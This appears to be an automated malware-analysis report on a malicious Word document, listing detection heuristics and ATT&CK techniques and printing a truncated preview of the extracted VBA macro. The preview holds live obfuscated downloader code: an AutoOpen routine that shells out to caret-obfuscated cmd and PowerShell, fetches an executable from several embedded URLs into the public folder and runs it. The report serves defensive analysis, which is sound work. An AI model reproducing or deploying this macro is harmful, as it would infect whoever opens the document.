MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a command, likely to download and run a second-stage payload. The presence of the AutoOpen macro and the detection by ClamAV strongly indicate malicious intent.
Heuristics 5
-
ClamAV: Doc.Downloader.Generic-6689860-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6689860-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5034 bytes |
SHA-256: 44a3e415bf4dae22f03f6e200295d64863de3963a1c5052c635d92208d36b55f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NaMQbpti"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const LihqmSXAsEi = 0
Dim VzvQcX(2)
VzvQcX(0) = Mid(pjzflRs, 58, 796)
VzvQcX(1) = Right(LCsbFFjF, 428)
Dim DhLwwI(2)
DhLwwI(0) = MidB(iOGKfiB, 537, 348)
DhLwwI(1) = MidB(iOGKfiB, 537, 348)
Dim wDLuG(2)
wDLuG(0) = Left(JErht, 810)
wDLuG(1) = Left(JErht, 810)
Dim rvcasX(5)
rvcasX(0) = Left(JErht, 810)
rvcasX(1) = MidB(iOGKfiB, 537, 348)
rvcasX(2) = MidB(iOGKfiB, 537, 348)
rvcasX(3) = Left(JErht, 810)
rvcasX(4) = Left(JErht, 810)
Dim mlhOpO(4)
mlhOpO(0) = Right(LCsbFFjF, 428)
mlhOpO(1) = Right(LCsbFFjF, 428)
mlhOpO(2) = Right(LCsbFFjF, 428)
mlhOpO(3) = MidB(iOGKfiB, 537, 348)
Dim fMGwjF(5)
fMGwjF(0) = MidB(iOGKfiB, 537, 348)
fMGwjF(1) = Right(LCsbFFjF, 428)
fMGwjF(2) = Mid(pjzflRs, 58, 796)
fMGwjF(3) = MidB(iOGKfiB, 537, 348)
fMGwjF(4) = MidB(iOGKfiB, 537, 348)
Shell@ BfXNd + QZoSFqBXUzi + fXjHSwY, LihqmSXAsEi
Dim VZVFZP(4)
VZVFZP(0) = MidB(iOGKfiB, 537, 348)
VZVFZP(1) = Right(LCsbFFjF, 428)
VZVFZP(2) = Left(JErht, 810)
VZVFZP(3) = Right(LCsbFFjF, 428)
Dim hZwLH(3)
hZwLH(0) = MidB(iOGKfiB, 537, 348)
hZwLH(1) = Right(LCsbFFjF, 428)
hZwLH(2) = Right(LCsbFFjF, 428)
Dim tmfpmN(4)
tmfpmN(0) = Left(JErht, 810)
tmfpmN(1) = MidB(iOGKfiB, 537, 348)
tmfpmN(2) = MidB(iOGKfiB, 537, 348)
tmfpmN(3) = Left(JErht, 810)
End Sub
Attribute VB_Name = "TlGJihvGEsd"
Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^ " + " ^ ^ ^ ^ ^ ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.